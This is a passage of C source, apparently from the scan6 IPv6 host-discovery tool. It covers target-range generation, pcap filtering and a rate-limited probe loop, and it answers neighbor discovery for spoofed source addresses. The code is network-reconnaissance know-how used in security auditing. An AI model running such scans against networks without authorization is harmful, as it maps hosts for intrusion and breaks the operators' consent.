entries"); exit(EXIT_FAILURE); } } if(tgt_knowniids_f){ if(!load_knowniid_entries(&scan_list, &prefix_list, &iid_list)){ puts("Couldn't load known IID IPv6 addresses"); exit(EXIT_FAILURE); } } if(tgt_knowniidsfile_f){ if(!load_knowniidfile_entries(&scan_list, &prefix_list, knowniids_fp)){ puts("Couldn't load known IID IPv6 addresses"); exit(EXIT_FAILURE); } fclose(knowniids_fp); } if(tgt_portembedded_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_embeddedport_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load embedded-port IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_lowbyte_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_lowbyte_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load prefixes for low-byte IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_ipv4mapped32_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_ipv4mapped32_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefixes for IPv4-embeded (32-bit) IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_ipv4mapped64_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_ipv4mapped64_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefixes for IPv4-embeded (64-bit) IPv6 addresses"); exit(EXIT_FAILURE); } } } if(tgt_vm_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_vm_entries(&scan_list, prefix_list.target[i], &v4host)){ puts("Couldn't load prefix for IEEE OUI"); exit(EXIT_FAILURE); } } } if(tgt_oui_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_oui_entries(&scan_list, prefix_list.target[i], &oui)){ puts("Couldn't load prefix for IEEE OUI"); exit(EXIT_FAILURE); } } } if(tgt_vendor_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_vendor_entries(&scan_list, prefix_list.target[i], vendor)){ puts("Couldn't load prefixes for the specified vendor"); exit(EXIT_FAILURE); } } } if(tgt_bruteforce_f){ for(i=0; i < prefix_list.ntarget; i++){ if(!load_bruteforce_entries(&scan_list, prefix_list.target[i])){ puts("Couldn't load prefixes for the specified destination prefix"); exit(EXIT_FAILURE); } } } if(idata.verbose_f && !bps_f && !pps_f){ puts("Rate-limiting probe packets to 1000 pps (override with the '-r' option if necessary)"); } if(idata.verbose_f){ printf("Target address ranges (%d)\n", scan_list.ntarget); if(!print_scan_entries(&scan_list)){ puts("Error while printing target address ranges"); exit(EXIT_FAILURE); } } if(!scan_local_f && !idata.ip6_global_flag){ if(idata.verbose_f){ puts("Cannot obtain a global address to scan remote network"); } exit(EXIT_FAILURE); } switch(probetype){ case PROBE_ICMP6_ECHO: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_ERQNSNA_FILTER, 0, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; case PROBE_UNREC_OPT: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_ERRORNSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; case PROBE_TCP: if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCP_NSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } break; } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ if(idata.verbose_f>1) printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); if(idata.verbose_f) puts("\nAlive nodes:"); FD_ZERO(&sset); FD_SET(idata.fd, &sset); lastprobe.tv_sec= 0; lastprobe.tv_usec=0; idata.pending_write_f=TRUE; while(!end_f){ rset= sset; wset= sset; eset= sset; if(!donesending_f){ timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; } else{ #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; #else timeout.tv_usec=0; timeout.tv_sec= SELECT_TIMEOUT; #endif } #ifdef DEBUG puts("Prior to select()"); #endif /* Check for readability and exceptions. We only check for writeability if there is pending data to send (the pcap descriptor will usually be writeable!). */ #if defined(sun) || defined(__sun) || defined(__linux__) if((sel=select(0, NULL, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, (idata.pending_write_f?&wset:NULL), &eset, &timeout)) == -1){ #endif if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } #ifdef DEBUG puts("After select()"); #endif if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } /* Check whether we have finished probing all targets */ if(donesending_f){ /* If we're not looping, just wait for SELECT_TIMEOUT seconds for any incoming responses. If we are looping (most likely because we're doing host-tracking, wait for nsleep seconds, and reset the targets. */ if(!loop_f){ if(is_time_elapsed(&curtime, &lastprobe, SELECT_TIMEOUT * 1000000)){ end_f=TRUE; } } else{ if(is_time_elapsed(&curtime, &lastprobe, nsleep * 1000000)){ reset_scan_list(&scan_list); donesending_f=FALSE; continue; } } } /* If we didn't check for writeability in the previous call to select(), we must do it now. Otherwise, we might block when trying to send a packet. */ #if !(defined(sun) || defined(__sun) || defined(__linux__)) #ifdef DEBUG puts("Prior secondary select()"); #endif if(!donesending_f && !idata.pending_write_f){ wset= sset; timeout.tv_usec=0; timeout.tv_sec= 0; if( (sel=select(idata.fd+1, NULL, &wset, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } idata.pending_write_f= TRUE; continue; } #ifdef DEBUG puts("After secondary select()"); #endif #endif #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif error_f=FALSE; #ifdef DEBUG puts("Prior to pcap_next_ex()"); #endif if((result=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ if(idata.verbose_f) printf("Error while reading packet in main loop: pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } #ifdef DEBUG puts("After to pcap_next_ex()"); #endif if(result == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_tcp = (struct tcp_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if( idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(is_ip6_in_address_list(&(idata.ip6_global), &(pkt_ns->nd_ns_target)) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.ip6_local))){ #ifdef DEBUG puts("Prior to send_neighbor_advert()"); #endif if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ if(idata.verbose_f) puts("Error sending Neighbor Advertisement message"); exit(EXIT_FAILURE); } #ifdef DEBUG puts("After to send_neighbor_advert()"); #endif } } else if( (probetype == PROBE_ICMP6_ECHO && pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) ||\ (probetype == PROBE_UNREC_OPT && pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if(!is_ip6_in_scan_list(&scan_list, &(pkt_ipv6->ip6_src))) continue; if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(valid_icmp6_response_remote(&idata, &scan_list, probetype, pkthdr, pktdata, buffer)){ /* Print the Source Address of the incoming packet */ if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata.verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } if(timestamps_f){ if(gettimeofday(&pcurtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(localtime_r( (time_t *) &(pcurtime.tv_sec), &pcurtimetm) == NULL){ if(idata.verbose_f>1) puts("localtime_r(): Error obtaining local time."); exit(EXIT_FAILURE); } if(strftime(date, DATE_STR_LEN, "%a %b %d %T %Y", &pcurtimetm) == 0){ if(idata.verbose_f>1) puts("strftime(): Error converting current time to text"); exit(EXIT_FAILURE); } printf("%s (%s)\n", pv6addr, date); } else{ printf("%s\n", pv6addr); } } } } else if(probetype == PROBE_TCP && pkt_ipv6->ip6_nxt == IPPROTO_TCP){ if(!is_ip6_in_scan_list(&scan_list, &(pkt_ipv6->ip6_src))) continue; if(srcport_f) if(pkt_tcp->th_dport != htons(srcport)) continue; if(dstport_f) if(pkt_tcp->th_sport != htons(dstport)) continue; if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata.verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } if(timestamps_f){ if(gettimeofday(&pcurtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(localtime_r((time_t *) &(pcurtime.tv_sec), &pcurtimetm) == NULL){ if(idata.verbose_f>1) puts("localtime_r(): Error obtaining local time."); exit(EXIT_FAILURE); } if(strftime(date, DATE_STR_LEN, "%a %b %d %T %Y", &pcurtimetm) == 0){ if(idata.verbose_f>1) puts("strftime(): Error converting current time to text"); exit(EXIT_FAILURE); } printf("%s (%s)\n", pv6addr, date); } else{ printf("%s\n", pv6addr); } } } } if(!donesending_f && !idata.pending_write_f && is_time_elapsed(&curtime, &lastprobe, pktinterval)){ idata.pending_write_f=TRUE; continue; } #if defined(sun) || defined(__sun) || defined(__linux__) if(!donesending_f && idata.pending_write_f){ #else if(!donesending_f && idata.pending_write_f && FD_ISSET(idata.fd, &wset)){ #endif idata.pending_write_f=FALSE; /* Check whether the current scan_entry is within range. Otherwise, get the next target */ if( !is_target_in_range(&scan_list)){ if(!get_next_target(&scan_list)){ if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } donesending_f=TRUE; continue; } } if(!send_probe_remote(&idata, &scan_list, &(idata.srcaddr), probetype)){ exit(EXIT_FAILURE); } if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(!get_next_target(&scan_list)){ donesending_f=TRUE; continue; } } #ifdef DEBUG puts("Prior to checking eset"); #endif #if !(defined(sun) || defined(__sun) || defined(__linux__)) if(FD_ISSET(idata.fd, &eset)){ if(idata.verbose_f) puts("scan6: Found exception on libpcap descriptor"); exit(EXIT_FAILURE); } #endif #ifdef DEBUG puts("After checking eset"); #endif } } exit(EXIT_SUCCESS); } /* * Function: reset_scan_list() * * Resets each scan_list.target[]->cur to scan_list.target[]->start. */ void reset_scan_list(struct scan_list *scan){ unsigned int i; for(i=0; i < scan->ntarget; i++) (scan->target[i])->cur = (scan->target[i])->start; scan->ctarget=0; return; } /* * Function: is_port_in_range() * * Checks whether a port_entry->cur is >= scan_entry->start && <= scan_entry->end */ int is_port_in_range(struct port_list *port_list){ struct port_entry *port_entry; if(port_list->cport >=port_list->nport || port_list->cport >= port_list->maxport){ return(0); } port_entry= port_list->port[port_list->cport]; if( port_entry->cur < port_entry->start || port_entry->cur > port_entry->end){ return(0); } return(1); } /* * Function: get_next_port() * * "Increments" a scan_entry structure to obtain the next target to scan. */ int get_next_port(struct port_list *port_list){ if((port_list->port[port_list->cport])->cur >= (port_list->port[port_list->cport])->end){ port_list->cport++; if(port_list->cport < port_list->nport && port_list->cport < port_list->maxport){ return(1); } else{ return(0); } } else{ (port_list->port[port_list->cport])->cur++; } return(1); } /* * Function: print_port_scan() * * Prints the result of a port scan */ void print_port_scan(struct port_list *port_list, unsigned int *res, int types){ int i, j; char portstring[10]; for(i=0; i< port_list->nport; i++){ for(j= (port_list->port[i])->start; j <= (port_list->port[i])->end; j++){ snprintf(portstring, sizeof(portstring), "%u/%s", j, (port_list->proto == IPPROTO_TCP)?"tcp":"udp"); portstring[sizeof(portstring)-1]=0; switch(res[j]){ case PORT_FILTERED: if(types & PORT_FILTERED) printf("%-9s filtered %s\n", portstring, port_list->port_table[j].name); break; case PORT_OPEN: if(types & PORT_OPEN) printf("%-9s open %s\n", portstring, port_list->port_table[j].name); break; case PORT_CLOSED: if(types & PORT_CLOSED) printf("%-9s closed %s\n", portstring, port_list->port_table[j].name); break; } } } } /* * Function: is_target_in_range() * * Checks whether a scan_entry->cur is >= scan_entry->start && <= scan_entry->end */ int is_target_in_range(struct scan_list *scan_list){ unsigned int i; struct scan_entry *scan_entry; if(scan_list->ctarget >= scan_list->ntarget || scan_list->ctarget >= scan_list->maxtarget){ return(0); } scan_entry= scan_list->target[scan_list->ctarget]; for(i=0; i<=7; i++){ if( ntohs((scan_entry->cur).s6addr16[i]) < ntohs((scan_entry->start).s6addr16[i]) || \ ( ntohs((scan_entry->cur).s6addr16[i]) > ntohs((scan_entry->end).s6addr16[i])) ){ return(0); } } return(1); } /* * Function: get_next_target() * * "Increments" a scan_entry structure to obtain the next target to scan. */ int get_next_target(struct scan_list *scan_list){ int i; unsigned int cind; for(i=7; i>=0; i--){ /* Increment scan_entry according to scan_entry->start and scan_entry->end, starting with the low-order word */ if( ntohs((scan_list->target[scan_list->ctarget])->cur.s6addr16[i]) >= \ ntohs((scan_list->target[scan_list->ctarget])->end.s6addr16[i])){ if(i==0){ scan_list->ctarget++; if(scan_list->ctarget < scan_list->ntarget && scan_list->ctarget < scan_list->maxtarget){ return(1); } else{ return(0); } } (scan_list->target[scan_list->ctarget])->cur.s6addr16[i]= (scan_list->target[scan_list->ctarget])->start.s6addr16[i]; } else{ /* We must increment the current word */ cind= scan_list->ctarget; /* If we're incrementing the lowest-order word, and the scan range is larger than MIN_INC_RANGE, we increment the word by scan_list->inc. Otherwise, we increment the word by 1. */ if(i==7 && ( ntohs((scan_list->target[cind])->end.s6addr16[7]) - ntohs( (scan_list->target[cind])->start.s6addr16[7]) ) \ >= MIN_INC_RANGE ){ /* If the increment would exceed scan_entry->end, we make it "wrap around" */ if( ((unsigned int) ntohs((scan_list->target[cind])->cur.s6addr16[7]) + scan_list->inc) > \ ntohs((scan_list->target[scan_list->ctarget])->end.s6addr16[7]) ){ (scan_list->target[cind])->cur.s6addr16[i]= htons((uint16_t)((unsigned int) ntohs((scan_list->target[cind])->start.s6addr16[i]) + \ ( (unsigned int) ntohs((scan_list->target[cind])->cur.s6addr16[i]) + \ scan_list->inc - ntohs((scan_list->target[cind])->start.s6addr16[i])) % \ ( ntohs((scan_list->target[cind])->end.s6addr16[i]) - \ ntohs((scan_list->target[cind])->start.s6addr16[i])))); } else{ /* Otherwise we simply increment the word with scan_list->inc */ scan_list->target[cind]->cur.s6addr16[i] = htons(ntohs(scan_list->target[cind]->cur.s6addr16[i]) + scan_list->inc); return(1); } } else{ /* If the scan range is smaller than MIN_IN_RANGE, or we are incrementing a word other than the lowest-order one, we try to increment in by 1. If this would exceed scan_entry->end, we set it to scan_entry->start and cause the next word to be incremented */ if( ((unsigned int) ntohs((scan_list->target[cind])->cur.s6addr16[i]) + 1) > ntohs(scan_list->target[cind]->end.s6addr16[i])){ (scan_list->target[cind])->cur.s6addr16[i]= (scan_list->target[cind])->start.s6addr16[i]; } else{ scan_list->target[cind]->cur.s6addr16[i] = htons(ntohs(scan_list->target[cind]->cur.s6addr16[i]) + 1); return(1); } } } } return(1); } /* * Function: print_scan_entries() * * Print address ranges to scan */ int print_scan_entries(struct scan_list *scan){ unsigned int i, j; for(i=0; i< scan->ntarget; i++){ for(j=0; j<8; j++){ if((scan->target[i])->start.s6addr16[j] == (scan->target[i])->end.s6addr16[j]) printf("%x", ntohs((scan->target[i])->start.s6addr16[j])); else printf("%x-%x", ntohs((scan->target[i])->start.s6addr16[j]), ntohs((scan->target[i])->end.s6addr16[j])); if(j<7) printf(":"); else puts(""); } } return(1); } /* * Function: load_ipv4mapped32_prefixes() * * Generate scan_entry's for IPv4-mapped (32-bits) addresses */ int load_ipv4mapped32_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; uint32_t mask32; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; for(i=4; i<=5; i++) (scan->target[scan->ntarget])->start.s6addr16[i]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[6]= htons( (uint16_t) (ntohl(v4host->ip.s_addr) >> 16)); (scan->target[scan->ntarget])->start.s6addr16[7]= htons( (uint16_t) (ntohl(v4host->ip.s_addr) & 0x0000ffff)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32<<1; for(i=0; i< v4host->len; i++) mask32=mask32>>1; (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons( (uint16_t)(mask32>>16)); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | htons((uint16_t)(mask32 & 0x0000ffff)); scan->ntarget++; return(1); } /* * Function: load_ipv4mapped64_prefixes() * * Generate scan_entry's for IPv4-mapped (64-bits) addresses */ int load_ipv4mapped64_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; uint32_t mask32; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6addr16[4]= htons( (uint16_t) (ntohl(v4host->ip.s_addr) >> 24)); (scan->target[scan->ntarget])->start.s6addr16[5]= htons( ((uint16_t) (ntohl(v4host->ip.s_addr) >> 16)) & 0x00ff); (scan->target[scan->ntarget])->start.s6addr16[6]= htons( (uint16_t) ((ntohl(v4host->ip.s_addr) >> 8) & 0x000000ff)); (scan->target[scan->ntarget])->start.s6addr16[7]= htons( (uint16_t) (ntohl(v4host->ip.s_addr) & 0x000000ff)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6addr16[i]= (scan->target[scan->ntarget])->start.s6addr16[i]; mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32<<1; for(i=0; i< v4host->len; i++) mask32=mask32>>1; (scan->target[scan->ntarget])->end.s6addr16[4]= (scan->target[scan->ntarget])->end.s6addr16[4] | htons( (uint16_t)(mask32>>24)); (scan->target[scan->ntarget])->end.s6addr16[5]= (scan->target[scan->ntarget])->end.s6addr16[5] | htons( (uint16_t)(mask32>>16 & 0x000000ff)); (scan->target[scan->ntarget])->end.s6addr16[6]= (scan->target[scan->ntarget])->end.s6addr16[6] | htons( (uint16_t)(mask32>>8 & 0x000000ff)); (scan->target[scan->ntarget])->end.s6addr16[7]= (scan->target[scan->ntarget])->end.s6addr16[7] | htons((uint16_t)(mask32 & 0x000000ff)); for(i=4; i<=7; i++){ (scan->target[scan->ntarget])->start.s6addr16[i]= htons( dec_to_hex(ntohs((scan->target[scan->ntarget])->start.s6addr16[i]))); (scan->target[scan->ntarget])->end.s6addr16[i]= htons( dec_to_hex(ntohs((scan->target[scan->ntarget])->end.s6addr16[i]))); } scan->ntarget++; return(1); } /* * Function: load_knownprefix_entries() * * Generate prefix_entry's for known prefixes (populate the prefix_list) */ int load_knownprefix_entries(struct scan_list *scan_list, struct scan_list *prefix_list, FILE *fp){ unsigned int i; int r; char line[MAX_LINE_SIZE], *ptr, *charptr, *charstart, *charend, *lastcolon; char rangestart[MAX_RANGE_STR_LEN+1], rangeend[MAX_RANGE_STR_LEN+1]; struct prefix_entry prefix; while(fgets(line, sizeof(line), fp) != NULL){ r= read_prefix(line, Strnlen(line, MAX_LINE_SIZE), &ptr); if(r == 1){ if( (ranges= address_contains_ranges(ptr)) == 1){ charptr= ptr; charstart= rangestart; charend= rangeend; lastcolon= charend; while(*charptr && (ptr - charptr) <= MAX_RANGE_STR_LEN){ if(*charptr != '-'){ *charstart= *charptr; *charend= *charptr; charstart++; charend++; if(*charptr==':') lastcolon= charend; charptr++; } else{ charend= lastcolon; charptr++; while(*charptr && (ptr - charptr) <= MAX_RANGE_STR_LEN && *charptr !=':' && *charptr !='-'){ *charend= *charptr; charend++; charptr++; } } } *charstart=0; *charend=0; tgt_range_f=TRUE; if(scan_list->ntarget <= scan_list->maxtarget){ if( (scan_list->target[scan_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f > 1) puts("scan6: Not enough memory"); return(0); } if ( inet_pton(AF_INET6, rangestart, &((scan_list->target[scan_list->ntarget])->start)) <= 0){ if(verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); return(0); } if ( inet_pton(AF_INET6, rangeend, &((scan_list->target[scan_list->ntarget])->end)) <= 0){ if(verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); return(0); } (scan_list->target[scan_list->ntarget])->cur= (scan_list->target[scan_list->ntarget])->start; /* Check whether the start address is smaller than the end address */ for(i=0;i<7; i++) if( ntohs((scan_list->target[scan_list->ntarget])->start.s6addr16[i]) > ntohs((scan_list->target[scan_list->ntarget])->end.s6addr16[i])){ if(verbose_f > 1) puts("Error in Destination Address range: Start address larger than end address!"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((scan_list->target[scan_list->ntarget])->start.in6_addr))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((scan_list->target[scan_list->ntarget])->end.in6_addr))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } scan_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } if(prefix_list->ntarget <= prefix_list->maxtarget){ if( (prefix_list->target[prefix_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f > 1) puts("scan6: Not enough memory"); return(0); } /* Copy the recently added target to our prefix list */ *(prefix_list->target[prefix_list->ntarget])= *(scan_list->target[scan_list->ntarget - 1]); prefix_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } } else if(ranges == 0){ if((charptr = strtok_r(ptr, "/", &lasts)) == NULL){ if(verbose_f > 1) puts("Error in Destination Address"); return(0); } if ( inet_pton(AF_INET6, charptr, &(prefix.ip6)) <= 0){ if(verbose_f > 1) puts("inet_pton(): Destination Address not valid"); return(0); } if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ prefix.len = atoi(charptr); if(prefix.len>128){ if(verbose_f > 1) puts("Prefix length error in IPv6 Destination Address"); return(0); } sanitize_ipv6_prefix(&(prefix.ip6), prefix.len); } else{ prefix.len= 128; } if(prefix_list->ntarget <= prefix_list->maxtarget){ if( (prefix_list->target[prefix_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scan6: Not enough memory"); return(0); } prefix_to_scan(&prefix, prefix_list->target[prefix_list->ntarget]); if(IN6_IS_ADDR_MULTICAST(&((prefix_list->target[prefix_list->ntarget])->start.in6_addr))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((prefix_list->target[prefix_list->ntarget])->end.in6_addr))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } prefix_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } } dst_f=TRUE; } else if(r == -1){ if(verbose_f){ printf("Error in 'known prefixes' file %s\n", knownprefixesfile); } fclose(fp); return(0); } } return(1); } /* * Function: load_knowniid_entries() * * Generate scan_entry's for known Interface IDs */ int load_knowniid_entries(struct scan_list *scan, struct scan_list *prefix, struct prefix_list *iid){ unsigned int i, j, k; for(i=0; i< iid->nprefix; i++){ for(j=0; j < prefix->ntarget; j++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= (prefix->target[j])->start; for(k=2; k<=3; k++) (scan->target[scan->ntarget])->start.in6_addr.s6_addr32[k]= (iid->prefix[i])->ip6.s6_addr32[k]; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= (prefix->target[j])->end; for(k=2; k<=3; k++) (scan->target[scan->ntarget])->end.in6_addr.s6_addr32[k]= (iid->prefix[i])->ip6.s6_addr32[k]; scan->ntarget++; } } return(1); } /* * Function: load_knowniidfile_entries() * * Generate scan_entry's for known Interface IDs */ int load_knowniidfile_entries(struct scan_list *scan, struct scan_list *prefix, FILE *fp){ unsigned int i; int r; char line[MAX_LINE_SIZE]; struct in6_addr iid; while(fgets(line, sizeof(line), fp) != NULL){ r= read_ipv6_address(line, Strnlen(line, MAX_LINE_SIZE), &iid); if(r == 1){ for(i=0; i< prefix->ntarget; i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= (prefix->target[i])->start; for(j=2; j<=3; j++) (scan->target[scan->ntarget])->start.in6_addr.s6_addr32[j]= iid.s6_addr32[j]; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= (prefix->target[i])->end; for(j=2; j<=3; j++) (scan->target[scan->ntarget])->end.in6_addr.s6_addr32[j]= iid.s6_addr32[j]; scan->ntarget++; } } else if(r == -1){ if(verbose_f){ printf("Error in 'known IIDs' file %s\n", knowniidsfile); } fclose(fp); return(0); } } return(1); } /* * Function: load_embeddedport_entries() * * Generate scan_entry's for IPv6 addresses with embedded service ports */ int load_embeddedport_entries(struct scan_list *scan, struct scan_entry *dst){ unsigned int i; for(i=0; i < (sizeof(service_ports_hex)/sizeof(uint16_t)); i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[6]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[7]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[6]= htons(EMBEDDED_PORT_2ND_WORD); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(service_ports_hex[i]); scan->ntarget++; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6addr16[6]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->start.s6addr16[7]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6addr16[6]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->end.s6addr16[7]= htons(EMBEDDED_PORT_2ND_WORD); scan->ntarget++; } for(i=0; i < (sizeof(service_ports_dec)/sizeof(uint16_t)); i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= 